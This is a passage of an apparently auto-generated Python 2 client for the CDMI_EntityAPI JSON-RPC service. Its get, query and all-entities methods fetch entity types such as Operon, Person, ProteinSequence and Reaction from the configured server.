if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Ontology(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Ontology',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Ontology(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Ontology',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Ontology(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Ontology',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Operon(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Operon',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Operon(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Operon',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Operon(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Operon',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_PairSet(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_PairSet',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_PairSet(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_PairSet',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_PairSet(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_PairSet',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Pairing(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Pairing',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Pairing(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Pairing',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Pairing(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Pairing',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Parameter(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Parameter',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Parameter(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Parameter',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Parameter(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Parameter',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Person(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Person',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Person(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Person',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Person(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Person',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Platform(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Platform',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Platform(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Platform',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Platform(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Platform',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_ProbeSet(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_ProbeSet',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_ProbeSet(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_ProbeSet',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_ProbeSet(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_ProbeSet',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_ProteinSequence(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_ProteinSequence',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_ProteinSequence(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_ProteinSequence',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_ProteinSequence(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_ProteinSequence',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Protocol(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Protocol',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Protocol(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Protocol',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Protocol(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Protocol',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Publication(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Publication',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Publication(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Publication',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Publication(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Publication',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Reaction(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Reaction',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Reaction(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Reaction',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Reaction(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Reaction',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
